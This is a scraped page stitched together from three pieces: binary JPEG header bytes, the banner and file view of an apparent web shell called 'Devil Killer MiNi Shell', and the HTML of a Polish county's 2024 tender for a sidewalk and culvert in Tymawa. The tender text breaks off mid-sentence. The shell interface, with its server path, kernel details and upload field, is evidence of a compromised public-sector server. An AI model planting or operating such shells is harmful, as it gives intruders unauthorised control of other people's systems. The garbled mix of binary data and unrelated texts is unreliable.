JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240219/0020850001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych związanych z zadaniem pn. &#34;Budowa chodnika oraz przebudowa przepustu w Tymawie przy drodze powiatowej 2823G&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Tczewski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675267</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piaskowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@powiat.tczew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">powiat.tczew.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych związanych z zadaniem pn. &#34;Budowa chodnika oraz przebudowa przepustu w Tymawie przy drodze powiatowej 2823G&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9ece8c78-cf00-11ee-875e-a22221c84ba7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00208500</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00045107/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 &#34;Budowa chodnika oraz przebudowa przepustu w Tymawie przy drodze powiatowej 2823G&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiat_tczew <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiat_tczew</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w Ustawie, odbywa się przy użyciu środków komunikacji<br/>elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2. Zgodnie z art. 63 ust. 2 Ustawy – ofertę wraz z oświadczeniami, o których mowa w art. 125 ust. 1 Ustawy, składa się – pod<br/>rygorem nieważności – w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>poprzez Platformę, dostępną pod adresem: https://platformazakupowa.pl/pn/powiat_tczew.<br/>3. W celu złożenia oferty należy zarejestrować się (zalogować) na platformie i postępować zgodnie z instrukcjami dostępnymi u<br/>dostawcy rozwiązania informatycznego pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>4. Korzystanie z platformy zakupowej przez Wykonawcę jest bezpłatne. Wykonawca przystępując do niniejszego postępowania o<br/>udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>adresem https://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji dostępnej pod adresem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view.<br/>5. Złożenie oferty następuje za pośrednictwem ”Formularza składania oferty” dostępnego na stronie dotyczącej danego<br/>postępowania:<br/>a) Szyfrowanie ofert odbywa się automatycznie przez system.<br/>b) Za datę złożenia oferty przyjmuje się datę jej przekazania w systemie poprzez kliknięcie przycisku ”ZŁÓŻ OFERTĘ” w drugim<br/>kroku i wyświetleniu komunikatu, że oferta została złożona.<br/>c) Wykonawca może, do upływu terminu do składania ofert, zmienić lub wycofać ofertę (sposób zmiany lub wycofania oferty<br/>określony został w ww. Instrukcji)<br/>d) Z uwagi na to, że złożona oferta jest zaszyfrowana nie można jej edytować w celu dokonania zmiany. Zmianę oferty należy<br/>dokonać poprzez wycofanie uprzednio złożonej oferty i złożenie nowej.<br/>e) Zmianę lub wycofanie oferty należy zrobić do upływu terminu składania ofert.<br/>f) Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty.<br/>g) Występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty do ilości 10 plików lub spakowanych folderów<br/>przy maksymalnej wielkości 150 MB.<br/>6. Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów<br/>elektronicznych (Dz. U. z 2020 r. poz. 1261), określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.:<br/>stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>włączona obsługa JavaScript,<br/>zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016), dalej zwanego RODO, Zamawiający informuje, że:<br/>1. Administratorem danych osobowych, które zostaną zawarte w Formularzu ofertowym i załącznikach jest Powiat Tczewski z siedzibą w Tczewie przy ul. Piaskowej 2.<br/>2. Dane kontaktowe do inspektora ochrony danych (IOD) w Starostwie Powiatowym w Tczewie to: inspektor@powiat.tczew.pl lub listownie na adres urzędu wskazany powyżej.<br/>3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przeprowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji zgodnie art. 275 ust. 1<br/>ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych, zwanej dalej Ustawą oraz w celu archiwizacji na podstawie<br/>rozporządzenia Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie Instrukcji kancelaryjnej, jednolitych rzeczowych<br/>wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych.<br/>4. Odbiorcami danych osobowych mogą być: podmioty przetwarzające – którym zlecimy czynności wymagające przetwarzania<br/>danych, np. dostawcy naszych systemów informatycznych, firmy zajmujące się archiwizacją dokumentów (aktualna lista jest<br/>dostępna u IOD) oraz podmioty upoważnione na podstawie przepisów prawa. Dane mogą być również udostępniane innym<br/>podmiotom, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 Ustawy. Zamawiający może udostępnić<br/>dane osobowe, o których mowa w art. 10 RODO, w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w<br/>dziale IX Ustawy, do upływu terminu na ich wniesienie. Dane pozyskane w związku z postępowaniem o udzielenie zamówienia<br/>publicznego mogą być przekazywane wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o<br/>udzielenie zamówienia publicznego jest jawne. Ograniczenie dostępu do danych osobowych może wystąpić jedynie w szczególnych<br/>przypadkach jeśli, jest to uzasadnione ochroną prywatności lub interesem publicznym, zgodnie z art. 18 ust. 5 pkt 1 i 2 Ustawy.<br/>5. Dane osobowe będą przechowywane w czasie określonym przepisami prawa, w szczególności zgodnie z art. 78 ust. 1 Ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, a następnie przez okres<br/>archiwizacji, zgodny z rozporządzeniem wymienionym w pkt 3.<br/>6. Podanie danych osobowych w związku z udziałem w postępowaniu o zamówienie publiczne nie jest obowiązkowe, ale może<br/>być warunkiem niezbędnym do wzięcia w nim udziału. Wynika to stąd, że w zależności od przedmiotu zamówienia, zamawiający<br/>może żądać ich podania na podstawie przepisów Ustawy oraz wydanych do niej przepisów wykonawczych, a w szczególności na<br/>podstawie Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Wykonawca ma prawo:<br/>a) dostępu do swoich danych. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 RODO, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu;<br/>b) ich sprostowania lub uzupełnienia – na podstawie art. 16 RODO.<br/>Zgodnie z art. 19 ust. 2 Ustawy skorzystanie z tego uprawnienia nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą;<br/>c) żądać ograniczenia ich przetwarzania – na podstawie art. 18 ust. 1 RODO Wystąpienie z przedmiotowym żądaniem, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>2. Wykonawcy nie przysługuje:<br/>a) prawo do usunięcia danych osobowych – w związku z art. 17 ust. 3 lit. b, d lub e RODO;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) prawo sprzeciwu wobec przetwarzania danych osobowych – na podstawie art. 21 RODO, gdyż podstawą prawną przetwarzania<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>3. Dane osobowe nie będą przekazywane do państwa trzeciego/organizacji międzynarodowej. Dane nie będą przetwarzane w<br/>sposób zautomatyzowany w tym również w formie profilowania.<br/>4. Wykonawca ma prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, iż przetwarzanie danych<br/>osobowych jego dotyczących narusza przepisy RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.5.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z realizacją zadania inwestycyjnego pn. „Budowa chodnika oraz przebudowa przepustu w Tymawie przy drodze powiatowej 2823G”. Roboty obejmują budowę chodnika o długości 895,0 m w drodze powiatowej nr 2823G <br/>na odcinku od Osiedla Leśnego do skrzyżowania z drogą gminną nr 228021G, <br/>w miejscowości Tymawa wraz z przebudową przepustu fi 800 pod drogą powiatową nr 2823G i przebudową istniejących zjazdów na posesje i pola. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45232451-8 - Roboty odwadniające i nawierzchniowe</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>6.2.1 zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>6.2.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>6.2.3 sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>6.2.4 zdolności technicznej lub zawodowej:<br/>1) Wykonawca spełni warunek dotyczący zdolności zawodowej, o którym mowa <br/>w art. 112 ust. 2 pkt 4 Ustawy, jeżeli wykaże, że wykonał, w okresie ostatnich <br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie:<br/>a) co najmniej 1 (jedno) zamówienie na roboty budowlane, obejmujące <br/>budowę lub przebudowę chodnika o długości min. 500 metrów <br/>bieżących;<br/>b) co najmniej 1 (jedno) zamówienie na roboty budowlane obejmujące <br/>budowę lub przebudowę przepustu albo budowę lub przebudowę <br/>odcinka kanalizacji deszczowej o długości min. 50 metrów bieżących.<br/> UWAGA: <br/>Zamawiający dopuszcza możliwość spełnienia powyższego warunku <br/>w ramach realizacji jednego lub dwóch zadań, przy czym oba zakresy <br/>doświadczenia musi spełniać jeden podmiot (Wykonawca lub podmiot na <br/>zasoby którego powołuje się Wykonawca).<br/>2) Wykonawca spełni warunek dotyczący zdolności zawodowej, o którym mowa <br/>w art. 112 ust. 2 pkt 4 Ustawy, jeżeli wykaże, że dysponuje osobą<br/>odpowiedzialną za kierowanie robotami budowlanymi, wraz z informacjami <br/>na temat jej kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia, niezbędnych do wykonania zamówienia publicznego <br/>oraz informacjami o podstawie dysponowania tą osobą, a mianowicie<br/>1 (jedną) osobę na stanowisko Kierownika Budowy posiadającą:<br/> uprawnienia budowlane upoważniające do pełnienia samodzielnej funkcji <br/>technicznej obejmującej kierowanie robotami w specjalności drogowej <br/>bez ograniczeń w zakresie niezbędnym do realizacji przedmiotu <br/>zamówienia, zgodnie z obowiązującymi przepisami prawa oraz która <br/>w dniu podpisania umowy będzie członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą Prawo budowlane oraz ustawą <br/>o samorządach zawodowych architektów oraz inżynierów budownictwa,<br/> min. 2-letnie doświadczenie zawodowe w pełnieniu funkcji kierownika <br/>budowy lub kierownika robót branży drogowej.<br/> UWAGA:<br/>Zamawiający, określając wymogi dla osoby w zakresie posiadanych <br/>uprawnień budowlanych, dopuszcza odpowiadające im kwalifikacje <br/>zawodowe/dokumenty uprawniające do wykonywania samodzielnych funkcji <br/>technicznych w budownictwie wydane obywatelom państw członkowskich <br/>Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich <br/>Europejskiego Porozumienia o Wolnym Handlu (EFTA) – stron umowy <br/>o Europejskim Obszarze Gospodarczym, z zastrzeżeniem art. 12 a i innych <br/>przepisów ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 2021 r. <br/>poz. 2351) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania <br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii <br/>Europejskiej (Dz.U. z 2021 r. poz. 1646) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, <br/> w trybie art. 274 ust. 1 Ustawy, do złożenia – w terminie nie krótszym niż 5<br/>dni – następujących podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>• odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/><br/>UWAGA:<br/>1) Zgodnie z art. 127 ust. 1 Ustawy, Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia<br/>17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał dane<br/>umożliwiające dostęp do tych środków. Z uwagi na powyższe Zamawiający nie wezwie do złożenia dokumentu określonego w pkt<br/>8.2 SWZ, jeżeli będzie mógł go uzyskać za pomocą bezpłatnych i ogólnodostępnych rejestrów, a Wykonawca wskaże w ofercie<br/>niezbędne, dane umożliwiające dostęp do tych dokumentów.<br/>2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, októrym mowa w pkt 8.2 SWZ, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub 